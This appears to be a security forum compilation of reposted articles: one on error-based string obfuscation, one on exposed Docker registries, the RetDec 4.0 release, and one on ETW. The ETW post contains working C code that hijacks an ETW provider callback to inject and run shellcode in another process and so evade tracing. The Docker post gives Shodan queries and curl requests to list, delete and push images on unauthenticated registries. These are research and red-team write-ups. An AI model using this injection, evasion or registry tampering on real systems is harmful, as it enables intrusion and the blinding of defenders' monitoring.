    generate_error_111(); /*o*/
    passwd[5] = get_last_error();
    generate_error_114(); /*r*/
    passwd[6] = get_last_error();
    generate_error_100(); /*d*/
    passwd[7] = get_last_error();
    generate_error_49(); /*1*/
    passwd[8] = get_last_error();
    generate_error_50(); /*2*/
    passwd[9] = get_last_error();
    generate_error_51(); /*3*/
    passwd[10] = get_last_error();
    passwd[11] = 0;

    printf("Enter a password: ");
    fgets(input, 50, stdin);

    if (strncmp(input, passwd, strnlen(passwd, 11)) == 0) {
        return 1;
    }

    return 0;
}

int main(int argc, char *argv[])
{
    if (check_input() == 1) {
        char * valid_pass = "Well done!";
        printf("%s\n", valid_pass);
    } else {
        char * invalid_pass = "Try again!";
        printf("%s\n", invalid_pass);
    }

    return 0;
}

NOTE: The get_last_error function is also system-dependent: on Windows, the function GetLastError() is used to retrieve the last error that occurred on the system, whereas on Linux you can use the global variable errno to retrieve the last error. The following sections will cover some deeper aspects of this technique, such as pros & cons and the basic engine that produces the transformation.

History

This idea came up 2-3 years ago, when I started programming with C for Windows systems. 
As with all beginnings, I kept getting errors when calling Windows API functions. At that time I was also analyzing malware families that obfuscated their strings, so I thought it could be a good idea to hide my strings using the system errors that my shitty code was producing. The idea of being able to create something meaningful out of a series of mistakes fascinated me. This meant something profound to me, as it is a metaphor for my life, in which after many mistakes I finally get things to work the way I want them to. And it somehow represents all those people who have been rejected for not having the right knowledge, at the right time, but who struggle every day to improve and achieve their dreams. The art of turning mistakes into success. Although the idea came up years ago, I didn't start to implement it until recently, since I didn't know very well how to start; but finally, after some months thinking about how to do it, informing myself, learning and reading, I think I've found the way to make it as clear as possible. I had a draft of the obfuscator written in Python, but taking advantage of the quarantine I decided to rewrite it in rust-lang, to reinforce the little knowledge I have about this language.

How does it work? Here is a brief explanation of what a minimal ebfuscator engine looks like.

Analyzer: The analyzer analyzes the code of the provided program in order to find those parts of the code you want to obfuscate. In the case of literals (the one I have implemented; the tool is available on my github), the analyzer looks for literal strings in the source code in order to convert each byte into errors.

Error tokenizer: This part is the key. It receives a byte as a parameter. Its task is simple: it needs to transform that byte into its corresponding system error, based on the available system errors for the target platform. 
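Concretely, the error-generation and byte-reconstruction idea can be sketched on Linux in Python: two easily provoked errno values (ENOENT = 2 from stat on a nonexistent path, EBADF = 9 from fstat on an unopened descriptor) serve as the available errors, and a byte is rebuilt by really triggering them and summing the results. The greedy odd/even split below is my own toy strategy for the sketch, not the author's tokenizer:

```python
import os

def generate_error_2():
    """Provoke ENOENT (2): stat a path that cannot exist."""
    try:
        os.stat("/non/existent/path/by/d00rt")
    except OSError as exc:
        return exc.errno
    return 0

def generate_error_9():
    """Provoke EBADF (9): fstat a file descriptor that is not open."""
    try:
        os.fstat(999999)
    except OSError as exc:
        return exc.errno
    return 0

GENERATORS = {2: generate_error_2, 9: generate_error_9}

def tokenize(byte, odd_err=9, even_err=2):
    """Toy tokenizer: express a byte as n*odd_err + m*even_err."""
    n = byte // odd_err
    while n >= 0 and (byte - odd_err * n) % even_err:
        n -= 1
    if n < 0:
        raise ValueError("byte not representable with these error codes")
    rest = byte - odd_err * n
    return [odd_err] * n + [even_err] * (rest // even_err)

def recover_byte(plan):
    """Rebuild the byte by really triggering each error and summing errno."""
    return sum(GENERATORS[err]() for err in plan)

# chr(recover_byte(tokenize(ord("p")))) rebuilds "p" even though "p"
# never appears in the program's data.
```

With just two implemented errors, any printable ASCII byte can be expressed as a plan of error codes, which is exactly the kind of strategy the error tokenizer section below discusses.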
In the best scenario, we should be capable of mapping all the possible values of a byte to a system error:

byte 0 -> generate_error_0()
byte 1 -> generate_error_1()
byte 2 -> generate_error_2()
..
byte 253 -> generate_error_253()
byte 254 -> generate_error_254()

But this is not always possible. For example, on Linux there are only 131 system errors, from 1 to 131... so even if we were capable of generating each error (which is not possible due to some limitations, like the hardware), how are you going to get the value 200 if we can't generate that error? Easy... by combining errors. For example, you can add 2 values. If you know how to generate error 100, what you can do is:

generate_error_100();
int aux_1 = get_last_error();
generate_error_100();
int aux_2 = get_last_error();
int value_200 = aux_1 + aux_2;

or you can also do the following:

generate_error_100();
int aux = get_last_error();
int value_200 = aux * 2;

So this depends on the strategy you implement based on the available errors for the target platform, and at least for me it was the most challenging part. There are also other limitations: for example, some errors are too difficult to obtain, some put the system where you are executing the obfuscated program at risk, and some errors do not depend on our program at all. For example, ERROR_NO_POOL_SPACE on Windows, which is error number 62 and means "Space to store the file waiting to be printed is not available on the server." I can't imagine how to generate this error. So yeah... generating an error is now an art. In future posts I'll explain how I implemented my error tokenizer, which allows you to get an ebfuscator with only a few error codes implemented. Of course there are many ways to implement it, and probably all of them are better than the one I did.

Pros & Cons

This obfuscation was created for fun; here are some of the pros and cons I have found. There are probably more on both sides. 
Pros
- The encoded secret is never stored in the binary, since its value is masked by the operating system.
- It's almost impossible to deobfuscate statically, since the errors depend on the system and on the computer where the obfuscated program is executed. This means that you can tie the errors to specific characteristics of a system, like the username, number of processors, folder names, installed programs...
- It generates a lot of code, which is too boring for an analyst to analyze and can slow down the reverse engineering process considerably.
- It can break the graph view of some debuggers such as IDA Pro, which shows the message "Sorry, this node is too big to display" (this is not due to the obfuscation itself; it is more related to how the error tokenizer is implemented, which adds a lot of overhead that causes this kind of error/warning).
- It can break the decompiler feature of some decompilers, such as the one used by IDA, which shows the message "Decompilation failure: call analysis failed" (again, this is more related to the overhead added by the error tokenizer implementation).

Cons
- It produces a lot of overhead. For each byte to obfuscate, it adds at least one function, which can contain many instructions and system API calls.
- You have to implement the code that generates the errors for each platform you want to support.
- The dependence on system errors. This means that if someday, somehow, the definition of these errors changes on the system, you will need to update them.
- The technique is easy to detect using heuristics.

Proof of Concept - Strings literals ebfuscator

I have implemented the first proof of concept which uses this technique; it is available on my github. I called it Ebfuscator. It was written in rust-lang, and for the moment I have only published the compiled binary of ebfuscator, which allows you to obfuscate string literals for a given C program. 
It supports both Windows and Linux platforms. Not many errors are implemented yet, so you can easily add more. You only need to define the function in {ebfuscator_folder}/errors/{platform}/errors.c and declare it in the file {ebfuscator_folder}/errors/{platform}/errors.h. Ebfuscator will then automatically use that error too in order to obfuscate the bytes. For more information about the tool, please read the README file in the repository. In this example I will obfuscate it for Linux, so the command line is the following: ./ebfuscator --platform linux --source ./examples/crackme_test.c -V passwd This command takes the program crackme_test.c and obfuscates the variable passwd using this technique. The output for this command is the following: the ./output directory is created, where you can find the obfuscated crackme_test.c, errors.c and errors.h files, which are needed to compile the program. Compiling the program: gcc -o target.bin ./output/ebfuscated.c ./output/errors.c -lm Now you can see that the program runs as expected. The following images show the before and after of both the original code compiled and the obfuscated code compiled, in IDA Pro. In the above image you can see how the basic block increases its size a lot: from 18 lines to 381. Now the password doesn't appear in the binary and is masked behind the system errors. Please feel free to open pull requests with new errors. Finally, I would like to encourage people to implement other transformations, such as control flow flattening, using this technique. Sursa: https://www.d00rt.eus/2020/04/ebfuscation-abusing-system-errors-for.html
-
Given the current worldwide pandemic and government-sanctioned lock-downs, working from home has become the norm …for now. Thanks to this, Zoom, “the leader in modern enterprise video communications”, is well on its way to becoming a household verb, and as a result, its stock price has soared! 📈 However, if you value either your (cyber) security or privacy, you may want to think twice about using (the macOS version of) the app. In this blog post, we’ll start by briefly looking at recent security and privacy flaws that affected Zoom. Following this, we’ll transition into discussing several new security issues that affect the latest version of Zoom’s macOS client. Patrick Wardle (Principal Security Researcher @ Jamf) Patrick Wardle is a Principal Security Researcher at Jamf and founder of Objective-See. Having worked at NASA and the NSA, as well as presented at countless security conferences, he is intimately familiar with aliens, spies, and talking nerdy. Patrick is passionate about all things related to macOS security and thus spends his days finding Apple 0days, analyzing macOS malware and writing free open-source security tools to protect Mac users.
-
Sandboxie Sandboxie is sandbox-based isolation software for 32- and 64-bit Windows NT-based operating systems. It was developed by Sophos (which acquired it from Invincea, which acquired it earlier from the original author Ronen Tzur). It creates a sandbox-like isolated operating environment in which applications can be run or installed without permanently modifying the local or mapped drive. An isolated virtual environment allows controlled testing of untrusted programs and web surfing. History Sandboxie was initially released in 2004 as a tool for sandboxing Internet Explorer. Over time, the program was expanded to support other browsers and arbitrary Win32 applications. In December 2013, Invincea announced the acquisition of Sandboxie. In February 2017, Sophos announced the acquisition of Invincea. Invincea posted an assurance on Sandboxie's website that, for the time being, Sandboxie's development and support would continue as normal. In September 2019, Sophos switched to a new license. In 2020, Sophos released Sandboxie to the community as open source under the GPLv3 license for further development and maintenance. Sursa: https://github.com/sandboxie-dev/Sandboxie
-
Docker Registries and their secrets Avinash Jain (@logicbomb_1) Apr 9 · 4 min read Never leave your docker registry publicly exposed! Recently, I have been exploring Docker a lot in search of misconfigurations that organizations inadvertently make, ending up exposing critical services to the internet. In continuation of my last blog, where I talked about how the misconfiguration of leaving a docker host/docker APIs public can leak critical assets, here I’ll be emphasizing how Shodan led me to dozens of “misconfigured” docker registries and how I penetrated one of them. Refining Shodan Search I tried a couple of search filters to find publicly exposed docker registries on Shodan - port:5001 200 OK port:5000 docker 200 OK The docker registry by default runs on port 5000 (HTTP) or 5001 (HTTPS), but this ends up giving many false positives, since people do not necessarily run docker only on port 5000/5001, and the “docker” keyword might occur anywhere - Docker keyword in HTTP response So, in order to find a unique value in the docker registry response that could give me the exact number of exposed docker registries, I set up my own docker registry (very nice documentation on setting up your own docker registry can be found on the official docker site — here). I found that every API response of the Docker registry contains the “Docker-Distribution-API-Version” header. Docker-Distribution-API-Version Header So my shodan search changed to Docker-Distribution-Api-Version 200 OK. 200 OK was intentionally included to find only unauthenticated docker registries (although this also has some false positives, as many authentication mechanisms can still give you a 200 status code). Shodan showed around 140+ docker registries publicly exposed without any kind of authentication. Penetrating Docker Registry Now the next job was to penetrate and explore one of the publicly exposed docker registries. 
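The enumeration walked through below can be scripted with nothing but Python's standard library. This is only an illustrative sketch: probe_registry hits the network, so run it only against a registry you own, and the base_url is a hypothetical target:

```python
import json
import urllib.request

def parse_catalog(body):
    """Extract repository names from a /v2/_catalog response body."""
    return json.loads(body).get("repositories", [])

def probe_registry(base_url):
    """Confirm V2 API support via the version header, then list repositories.

    base_url is a hypothetical target such as "http://registry-ip:5000".
    Returns None if the endpoint does not look like a V2 registry.
    """
    with urllib.request.urlopen(base_url + "/v2/", timeout=5) as resp:
        api = resp.headers.get("Docker-Distribution-Api-Version", "")
        if resp.getcode() != 200 or not api.startswith("registry/2"):
            return None
    with urllib.request.urlopen(base_url + "/v2/_catalog", timeout=5) as resp:
        return parse_catalog(resp.read())
```

The same Docker-Distribution-Api-Version header used for the Shodan search doubles as the confirmation check before any further requests are sent.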
What came to great help for me was again the excellent documentation put up by docker on their official website — here. 1/ API VERSION CHECK Making a curl request to the following endpoint and checking the status code provides a second level of confirmation of whether the docker registry can be accessed. Quoting from the official docker documentation: “If a 200 OK response is returned, the registry implements the V2(.1) registry API and the client may proceed safely with other V2 operations”. curl -X GET http://registry-ip:port/v2/ 2/ REPOSITORY LIST The next task was to list the repositories present in the docker registry, for which the following endpoint is used — curl -X GET http://registry-ip:port/v2/_catalog Listing repositories The following endpoint provides the list of tags for a specific repository — GET /v2/<repo-name>/tags/list 3/ DELETE REPOSITORY To delete a particular repository, you need the repository name and its reference. Here, reference refers to the digest of the image. A delete may be issued with the following request format: DELETE /v2/<name>/manifests/<reference> To list the digests of a specific repository for a specific tag (/v2/<name>/manifests/<tag>) — Listing digest If a 202 Accepted status code is received, that means the image has been successfully deleted. 4/ PUSHING AN IMAGE Similarly, if the push operation is allowed, a 202 status code will be received. The following endpoint is used — POST /v2/<name>/blobs/uploads/ Conclusion Shodan shows around 140+ docker registries that are publicly exposed without any kind of authentication. The later part of the blog shows how easy it is to penetrate a docker registry and exploit it. In all, the lesson is to never expose your docker registry to the public internet. By default, it doesn’t have any authentication. Since docker registries don’t have a default authentication mechanism, at least basic auth could thwart some potential attacks. 
This can be mitigated by setting or enforcing basic auth over it, keeping the docker registry behind a VPN, and preventing outside access. https://docs.docker.com/registry/deploying/#native-basic-auth Any organization which is heavily using containers for running applications and services, or which is moving towards a containerized platform, should understand and evaluate the security risks around them, mainly the misconfigurations present in docker. Proper security controls, audits, and configuration reviews need to be carried out on a periodic basis. Thanks for reading! ~Logicbomb ( https://twitter.com/logicbomb_1 ) Sursa: https://medium.com/@logicbomb_1/docker-registries-and-their-secrets-47147106e09
-
RetDec v4.0 is out

7 days ago, by Peter Matula

RetDec is an open-source machine-code decompiler based on LLVM. It isn’t limited to one target architecture, operating system, or executable file format:

Runs on Windows, Linux, and macOS.
Supports all the major object-file formats: Windows PE, Unix ELF, macOS Mach-O.
Supports all the prevailing architectures: x86, x64, arm, arm64, mips, powerpc.

Since its initial public release in December 2017, we have released three other stable versions:

v3.0 — The initial public release.
v3.1 — Added macOS support, simplified the repository structure, reimplemented the recursive-traversal decoder.
v3.2 — Replaced all shell scripts with Python and thus made the usage much simpler.
v3.3 — Added the x64 architecture, added FreeBSD support (maintained by the community), deployed a new LLVM-IR-to-BIR converter.

Now, we are glad to announce a new version 4.0 release with the following major features: added arm64 architecture, added JSON output option, implemented a new build system, and implemented the retdec library. See the changelog for the complete list of new features, enhancements, and fixes.

1. arm64 architecture

This one is clear — now you can decompile arm64 binary files with RetDec!

Adding a new architecture is isolated to the capstone2llvmir library. Thus, it is doable with little knowledge about the rest of RetDec. In fact, the library already supports mips64 and powerpc64 as well. These aren’t yet enabled by RetDec itself because we haven’t got around to testing them adequately. Any architecture included in Capstone could be implemented. We even put together a how-to-do-it wiki page so that anyone can contribute.

2. JSON output option

As one would expect, RetDec by default produces C source code as its output. This is fine for consumption by humans, but what if another program wants to make use of it? Parsing high-level-language source code isn’t trivial.
Furthermore, additional meta-information may be required to enhance the user experience or automated analysis — information that is hard to convey in a traditional high-level language. For this reason, we added an option to generate the output as a sequence of annotated lexer tokens. Two output formats are possible:

Human-readable JSON containing proper indentation (option -f json-human).
Machine-readable JSON without any indentation (option -f json).

This means that if you run retdec-decompiler.py -f json-human input, you get the following output:

{
  "tokens": [
    { "addr": "0x804851c" },
    { "kind": "i_var", "val": "result" },
    { "addr": "0x804854c" },
    { "kind": "ws", "val": " " },
    { "kind": "op", "val": "=" },
    { "kind": "ws", "val": " " },
    { "kind": "i_var", "val": "ack" },
    { "kind": "punc", "val": "(" },
    { "kind": "i_var", "val": "m" },
    { "kind": "ws", "val": " " },
    { "kind": "op", "val": "-" },
    { "kind": "ws", "val": " " },
    { "kind": "l_int", "val": "1" },
    { "kind": "op", "val": "," },
    { "kind": "ws", "val": " " },
    { "kind": "l_int", "val": "1" },
    { "kind": "punc", "val": ")" },
    { "kind": "punc", "val": ";" }
  ],
  "language": "C"
}

instead of this one:

result = ack(m - 1, 1);

In addition to the source-code token values, there is meta-information on token types, and even the assembly-instruction addresses from which these tokens were generated. The addresses are on a per-command basis at the moment, but we plan to make them even more granular in the future. See the Decompiler outputs wiki page for more details.

The JSON output option is currently used in RetDec’s Radare2 plugin and an upcoming IDA plugin v1.0. Feel free to use it in your projects as well.

3. New build system

RetDec is a collection of libraries, executables, and resources. Chained together in a script, we get the decompiler itself — retdec-decompiler.py. But what about all the individual components? Couldn’t they be useful on their own? Most definitely they could!
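As an aside, a consumer of the machine-readable format only has to walk the token list. The following is an illustration (not RetDec code, just a sketch over the exact json-human output shown above) that rebuilds the source line and an address-to-text mapping:

```python
# The token stream from the json-human example above, as a Python literal.
tokens = [
    {"addr": "0x804851c"},
    {"kind": "i_var", "val": "result"},
    {"addr": "0x804854c"},
    {"kind": "ws", "val": " "},
    {"kind": "op", "val": "="},
    {"kind": "ws", "val": " "},
    {"kind": "i_var", "val": "ack"},
    {"kind": "punc", "val": "("},
    {"kind": "i_var", "val": "m"},
    {"kind": "ws", "val": " "},
    {"kind": "op", "val": "-"},
    {"kind": "ws", "val": " "},
    {"kind": "l_int", "val": "1"},
    {"kind": "op", "val": ","},
    {"kind": "ws", "val": " "},
    {"kind": "l_int", "val": "1"},
    {"kind": "punc", "val": ")"},
    {"kind": "punc", "val": ";"},
]

def render(tokens):
    # "addr" entries carry no text; every other token contributes its value.
    return "".join(t["val"] for t in tokens if "val" in t)

def addr_map(tokens):
    # Map each assembly address to the source text emitted after it.
    out, current = {}, None
    for t in tokens:
        if "addr" in t:
            current = t["addr"]
            out.setdefault(current, "")
        else:
            out[current] += t["val"]
    return out

print(render(tokens))
print(addr_map(tokens))
```

Running this prints the reconstructed C statement and shows which instruction addresses produced which fragment of it.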
Until now, the RetDec components weren’t easy to use. As of version 4.0, the installation contains all the resources necessary to utilize them in other CMake projects.

If RetDec is installed into a standard system location (e.g. /usr), its library components can be used as simply as:

find_package(retdec 4.0
    REQUIRED
    COMPONENTS <component> [...]
)
target_link_libraries(your-project
    PUBLIC retdec::<component> [...]
)

If it isn’t installed somewhere where it can be discovered, CMake needs help before find_package() is used. There are generally two ways to do it:

Add the RetDec installation directory to CMAKE_PREFIX_PATH:
list(APPEND CMAKE_PREFIX_PATH ${RETDEC_INSTALL_DIR})

Set the path to the installed RetDec CMake scripts in retdec_DIR:
set(retdec_DIR ${RETDEC_INSTALL_DIR}/share/retdec/cmake)

It is also possible to configure the build system to produce only the selected component(s). This can significantly speed up compilation. The desired components can be enabled at CMake-configuration time by one of these parameters:

-D RETDEC_ENABLE_<component>=ON [...]
-D RETDEC_ENABLE=component[,...]

See Repository Overview for the list of available RetDec components, retdec-build-system-tests for component demos, and Build Instructions for the list of possible CMake options.
It adds a new library called retdec, which will eventually implement a comprehensive decompilation interface. As a first step, it currently offers disassembling functionality. That is, a full recursive-traversal decoding of a given input file into an LLVM IR module and structured (functions & basic blocks) Capstone disassembly.

It also provides us with a good opportunity to demonstrate most of the things this article talked about. The following source code is all that’s needed to get to a complete LLVM IR and Capstone disassembly of an input file:

#include <iostream>
#include <retdec/retdec/retdec.h>
#include <retdec/llvm/Support/raw_ostream.h>

int main(int argc, char* argv[])
{
    if (argc != 2)
    {
        llvm::errs() << "Expecting path to input\n";
        return 1;
    }
    std::string input = argv[1];

    retdec::common::FunctionSet fs;
    retdec::LlvmModuleContextPair llvm = retdec::disassemble(input, &fs);

    // Dump entire LLVM IR module.
    llvm::outs() << *llvm.module;

    // Dump functions, basic blocks, instructions.
    for (auto& f : fs)
    {
        llvm::outs() << f.getName() << " @ " << f << "\n";
        for (auto& bb : f.basicBlocks)
        {
            llvm::outs() << "\t" << "bb @ " << bb << "\n";
            // These are not only text entries.
            // There is a full Capstone instruction.
            for (auto* i : bb.instructions)
            {
                llvm::outs() << "\t\t"
                    << retdec::common::Address(i->address) << ": "
                    << i->mnemonic << " " << i->op_str << "\n";
            }
        }
    }

    return 0;
}

The CMake script building it looks like this:

cmake_minimum_required(VERSION 3.6)
project(demo)

find_package(retdec 4.0
    REQUIRED
    COMPONENTS retdec llvm
)

add_executable(demo demo.cpp)
target_link_libraries(demo
    retdec::retdec
    retdec::deps::llvm
)

If RetDec is installed somewhere where it can be discovered, the demo can be built simply with:

cmake ..
make

If it is not, one option is to set the path to the installed CMake scripts:

cmake ..
-Dretdec_DIR=$RETDEC_INSTALL_DIR/share/retdec/cmake
make

If we are building RetDec ourselves, we can configure CMake to enable only the retdec library with cmake .. -DRETDEC_ENABLE_RETDEC=ON.

What’s next?

We believe that for effective and efficient manual malware analysis, it is best to selectively decompile only the interesting functions, interact with the results, and gradually compose an understanding of the inspected binary. Such a workflow is enabled by RetDec’s IDA and Radare2 plugins, but not so much by its native one-off mode of operation. Especially when performance on medium-to-large files is still an ongoing issue. We also believe in the ever-increasing role of advanced automated malware analysis. For these reasons, RetDec will move further in the direction outlined in the previous section. Having all the decompilation functionality available in a set of libraries will enable us to build better tools for both manual and automated malware analysis.

Reversing tools series

With this introductory piece, we are starting a series of articles focused on the engineering behind reversing tools. So, if you are interested in the inner workings of such tools, do look out for new posts here!

Sursa: https://engineering.avast.io/retdec-v4-0-is-out/
-
Another method of bypassing ETW and Process Injection via ETW registration entries.

Posted on April 8, 2020 by odzhan

Contents

1. Introduction
2. Registering Providers
3. Locating the Registration Table
4. Parsing the Registration Table
5. Code Redirection
6. Disable Tracing
7. Further Research

1. Introduction

This post briefly describes some techniques used by Red Teams to disrupt detection of malicious activity by the Event Tracing facility for Windows. It’s relatively easy to find information about registered ETW providers in memory and use it to disable tracing or perform code redirection. Since 2012, wincheck has provided an option to list ETW registrations, so what’s discussed here isn’t all that new. Rather than explain how ETW works and what it’s for, please refer to the list of links here. For this post, I took inspiration from Hiding your .NET – ETW by Adam Chester, which includes a PoC for EtwEventWrite. There’s also a PoC called TamperETW, by Cornelis de Plaa. A PoC to accompany this post can be found here.

2. Registering Providers

At a high level, providers register using the advapi32!EventRegister API, which is usually forwarded to ntdll!EtwEventRegister. This API validates arguments and forwards them to ntdll!EtwNotificationRegister. The caller provides a unique GUID that normally represents a well-known provider on the system, an optional callback function, and an optional callback context. Registration handles are the memory address of an entry combined with the table index shifted left by 48 bits. The handle may be used later with EventUnregister to disable tracing.

The main functions of interest to us are those responsible for creating registration entries and storing them in memory. ntdll!EtwpAllocateRegistration tells us the size of the structure is 256 bytes. Functions that read and write entries tell us what most of the fields are used for.
typedef struct _ETW_USER_REG_ENTRY {
    RTL_BALANCED_NODE  RegList;         // List of registration entries
    ULONG64            Padding1;
    GUID               ProviderId;      // GUID to identify Provider
    PETWENABLECALLBACK Callback;        // Callback function executed in response to NtControlTrace
    PVOID              CallbackContext; // Optional context
    SRWLOCK            RegLock;         //
    SRWLOCK            NodeLock;        //
    HANDLE             Thread;          // Handle of thread for callback
    HANDLE             ReplyHandle;     // Used to communicate with the kernel via NtTraceEvent
    USHORT             RegIndex;        // Index in EtwpRegistrationTable
    USHORT             RegType;         // 14th bit indicates a private
    ULONG64            Unknown[19];
} ETW_USER_REG_ENTRY, *PETW_USER_REG_ENTRY;

ntdll!EtwpInsertRegistration tells us where all the entries are stored. For Windows 10, they can be found in a global variable called ntdll!EtwpRegistrationTable.

3. Locating the Registration Table

A number of functions reference it, but none are public.

EtwpRemoveRegistrationFromTable
EtwpGetNextRegistration
EtwpFindRegistration
EtwpInsertRegistration

Since we know the type of structures to look for in memory, a good old brute-force search of the .data section in ntdll.dll is enough to find it.

LPVOID etw_get_table_va(VOID) {
    LPVOID                m, va = NULL;
    PIMAGE_DOS_HEADER     dos;
    PIMAGE_NT_HEADERS     nt;
    PIMAGE_SECTION_HEADER sh;
    DWORD                 i, cnt;
    PULONG_PTR            ds;
    PRTL_RB_TREE          rbt;
    PETW_USER_REG_ENTRY   re;

    m   = GetModuleHandle(L"ntdll.dll");
    dos = (PIMAGE_DOS_HEADER)m;
    nt  = RVA2VA(PIMAGE_NT_HEADERS, m, dos->e_lfanew);
    sh  = (PIMAGE_SECTION_HEADER)((LPBYTE)&nt->OptionalHeader +
          nt->FileHeader.SizeOfOptionalHeader);

    // locate the .data segment, save VA and number of pointers
    for(i=0; i<nt->FileHeader.NumberOfSections; i++) {
      if(*(PDWORD)sh[i].Name == *(PDWORD)".data") {
        ds  = RVA2VA(PULONG_PTR, m, sh[i].VirtualAddress);
        cnt = sh[i].Misc.VirtualSize / sizeof(ULONG_PTR);
        break;
      }
    }

    // For each pointer minus one
    for(i=0; i<cnt - 1; i++) {
      rbt = (PRTL_RB_TREE)&ds[i];

      // Skip pointers that aren't heap memory
      if(!IsHeapPtr(rbt->Root)) continue;

      // It might be the registration table.
      // Check if the callback is code
      re = (PETW_USER_REG_ENTRY)rbt->Root;
      if(!IsCodePtr(re->Callback)) continue;

      // Save the virtual address and exit loop
      va = &ds[i];
      break;
    }
    return va;
}

4. Parsing the Registration Table

ETW Dump can display information about each ETW provider in the registration table of one or more processes. The name of a provider (with the exception of private providers) is obtained using ITraceDataProvider::get_DisplayName. This method uses the Trace Data Helper API, which internally queries WMI.

Node        : 00000267F0961D00
GUID        : {E13C0D23-CCBC-4E12-931B-D9CC2EEE27E4} (.NET Common Language Runtime)
Description : Microsoft .NET Runtime Common Language Runtime - WorkStation
Callback    : 00007FFC7AB4B5D0 : clr.dll!McGenControlCallbackV2
Context     : 00007FFC7B0B3130 : clr.dll!MICROSOFT_WINDOWS_DOTNETRUNTIME_PROVIDER_Context
Index       : 108
Reg Handle  : 006C0267F0961D00

5. Code Redirection

The Callback function for a provider is invoked at the request of the kernel to enable or disable tracing. For the CLR, the relevant function is clr!McGenControlCallbackV2. Code redirection is achieved by simply replacing the callback address with the address of a new callback. Of course, it must use the same prototype, otherwise the host process will crash once the callback finishes executing. We can invoke the new callback using the StartTrace and EnableTraceEx APIs, although there may be a simpler way via NtTraceControl.
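As a sanity check on the handle format from section 2, the Reg Handle in the dump above can be recomputed from the Node address and Index. A quick sketch in plain arithmetic, mirroring the C expression used later in etw_disable:

```python
# Registration handle = entry (node) address OR'd with the table index
# shifted left by 48 bits, i.e. the same computation as the C code:
#   RegHandle = (REGHANDLE)((ULONG64)node | (ULONG64)index << 48)
def reg_handle(node_addr, reg_index):
    return node_addr | (reg_index << 48)

def split_handle(handle):
    # Recover the entry address (low 48 bits) and index (high bits).
    return handle & ((1 << 48) - 1), handle >> 48

# Values from the ETW Dump output above: Node 00000267F0961D00, Index 108.
h = reg_handle(0x00000267F0961D00, 108)
print(hex(h))  # matches the "Reg Handle" line in the dump
```

This works on user-mode addresses because the upper 16 bits of a canonical x64 user-mode pointer are zero, leaving them free to store the table index.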
// inject shellcode into process using ETW registration entry
BOOL etw_inject(DWORD pid, PWCHAR path, PWCHAR prov) {
    RTL_RB_TREE             tree;
    PVOID                   etw, pdata, cs, callback;
    HANDLE                  hp;
    SIZE_T                  rd, wr;
    ETW_USER_REG_ENTRY      re;
    PRTL_BALANCED_NODE      node;
    OLECHAR                 id[40];
    TRACEHANDLE             ht;
    DWORD                   plen, bufferSize;
    PWCHAR                  name;
    PEVENT_TRACE_PROPERTIES prop;
    BOOL                    status = FALSE;
    const wchar_t etwname[] = L"etw_injection\0";

    if(path == NULL) return FALSE;

    // try read shellcode into memory
    plen = readpic(path, &pdata);
    if(plen == 0) {
      wprintf(L"ERROR: Unable to read shellcode from %s\n", path);
      return FALSE;
    }

    // try obtain the VA of ETW registration table
    etw = etw_get_table_va();
    if(etw == NULL) {
      wprintf(L"ERROR: Unable to obtain address of ETW Registration Table.\n");
      return FALSE;
    }

    printf("*********************************************\n");
    printf("EtwpRegistrationTable for %i found at %p\n", pid, etw);

    // try open target process
    hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    if(hp == NULL) {
      xstrerror(L"OpenProcess(%ld)", pid);
      return FALSE;
    }

    // use (Microsoft-Windows-User-Diagnostic) unless specified
    node = etw_get_reg(
      hp, etw, prov != NULL ?
      prov : L"{305FC87B-002A-5E26-D297-60223012CA9C}",
      &re);

    if(node != NULL) {
      // convert GUID to string and display name
      StringFromGUID2(&re.ProviderId, id, sizeof(id));
      name = etw_id2name(id);

      wprintf(L"Address of remote node : %p\n", (PVOID)node);
      wprintf(L"Using %s (%s)\n", id, name);

      // allocate memory for shellcode
      cs = VirtualAllocEx(hp, NULL, plen,
        MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

      if(cs != NULL) {
        wprintf(L"Address of old callback : %p\n", re.Callback);
        wprintf(L"Address of new callback : %p\n", cs);

        // write shellcode
        WriteProcessMemory(hp, cs, pdata, plen, &wr);

        // initialize trace
        bufferSize = sizeof(EVENT_TRACE_PROPERTIES) + sizeof(etwname) + 2;
        prop = (EVENT_TRACE_PROPERTIES*)LocalAlloc(LPTR, bufferSize);
        prop->Wnode.BufferSize    = bufferSize;
        prop->Wnode.ClientContext = 2;
        prop->Wnode.Flags         = WNODE_FLAG_TRACED_GUID;
        prop->LogFileMode         = EVENT_TRACE_REAL_TIME_MODE;
        prop->LogFileNameOffset   = 0;
        prop->LoggerNameOffset    = sizeof(EVENT_TRACE_PROPERTIES);

        if(StartTrace(&ht, etwname, prop) == ERROR_SUCCESS) {
          // save callback
          callback = re.Callback;
          re.Callback = cs;

          // overwrite existing entry with shellcode address
          WriteProcessMemory(hp,
            (PBYTE)node + offsetof(ETW_USER_REG_ENTRY, Callback),
            &cs, sizeof(ULONG_PTR), &wr);

          // trigger execution of shellcode by enabling trace
          if(EnableTraceEx(&re.ProviderId, NULL, ht,
            1, TRACE_LEVEL_VERBOSE, (1 << 16), 0, 0, NULL) == ERROR_SUCCESS)
          {
            status = TRUE;
          }

          // restore callback
          WriteProcessMemory(hp,
            (PBYTE)node + offsetof(ETW_USER_REG_ENTRY, Callback),
            &callback, sizeof(ULONG_PTR), &wr);

          // disable tracing
          ControlTrace(ht, etwname, prop, EVENT_TRACE_CONTROL_STOP);
        } else {
          xstrerror(L"StartTrace");
        }
        LocalFree(prop);
        VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT | MEM_RELEASE);
      }
    } else {
      wprintf(L"ERROR: Unable to get registration entry.\n");
    }
    CloseHandle(hp);
    return status;
}

6.
Disable Tracing

If you examine clr!McGenControlCallbackV2 in more detail, you’ll see that it changes values in the callback context to enable or disable event tracing. For the CLR, the following structure and function are used. Again, these may be defined differently for different versions of the CLR.

typedef struct _MCGEN_TRACE_CONTEXT {
    TRACEHANDLE      RegistrationHandle;
    TRACEHANDLE      Logger;
    ULONGLONG        MatchAnyKeyword;
    ULONGLONG        MatchAllKeyword;
    ULONG            Flags;
    ULONG            IsEnabled;
    UCHAR            Level;
    UCHAR            Reserve;
    USHORT           EnableBitsCount;
    PULONG           EnableBitMask;
    const ULONGLONG* EnableKeyWords;
    const UCHAR*     EnableLevel;
} MCGEN_TRACE_CONTEXT, *PMCGEN_TRACE_CONTEXT;

void McGenControlCallbackV2(
    LPCGUID              SourceId,
    ULONG                IsEnabled,
    UCHAR                Level,
    ULONGLONG            MatchAnyKeyword,
    ULONGLONG            MatchAllKeyword,
